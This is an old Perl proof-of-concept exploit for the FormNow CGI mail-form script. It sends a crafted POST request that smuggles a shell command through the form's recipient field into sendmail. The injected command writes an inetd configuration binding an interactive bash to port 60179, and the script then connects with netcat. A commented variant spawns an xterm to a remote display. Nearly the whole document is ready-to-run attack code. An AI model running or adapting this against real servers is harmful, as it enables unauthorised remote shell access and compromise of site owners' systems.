#!/usr/bin/perl -w

## FormNow Version 1.0 / Proof of Concept exploit.
## Way to the Web Limited - www.waytotheweb.com
##
## This code exploits an insecure call to sendmail
## in the FormNow CGI script. Please note that this
## exploit will only work if the script has been
## configured to use sendmail. 
##
## This exploit will attempt to bind a shell, using 
## inetd, to port fido/60179. Code to spawn an xterm
## is included.
##
## [ Thu Oct 12 01:59:00 CEST 2000 ]
## http://teleh0r.cjb.net/ || teleh0r@doglover.com

use strict; use Socket;

if (@ARGV < 1) {
    print("Usage: $0 <target>\n");
    exit(1);
}

my($target,$length,$cgicode,$agent,$sploit, 
   $iaddr,$paddr,$proto);

$target = $ARGV[0];

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/formnow.cgi\n");

$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

$cgicode =

# echo 'fido stream tcp nowait nobody /bin/bash bash -i' > /tmp/.hass;
# /usr/sbin/inetd /tmp/.hass

"Name=heh&email=heh%40heh.no&Message=heh%21&to=%26+echo+%27".
"fido+stream+tcp+nowait+nobody+%2Fbin%2Fbash+bash+-i%27%3E%".
"2Ftmp%2F.hass%3B%2Fusr%2Fsbin%2Finetd+%2Ftmp%2F.hass&subje".
"ct=Email+Form+Message&confirm=";

# Spawn an xterm from $target to $attacker code.
# Some changes would have to be made to this exploit of course.

#"Name=teleh0r&email=teleh0r%40doglover.com&Message=h4ss%21&".
#"to=%26+xterm+-ut+-display+localhost%3A0&subject=Email+Form".
#"+Message&confirm=";

$sploit =
"POST /cgi-bin/formnow.cgi HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: 227

$cgicode";

$iaddr = inet_aton($target)                     || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)                || die("Error: $!\n");
$proto = getprotobyname('tcp')                  || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
connect(SOCKET, $paddr)                         || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
close(SOCKET);

print("\nSleeping 5 seconds - waiting for the shell ...\n\n");
sleep(5); system("nc -w 10 $target 60179"); exit(0);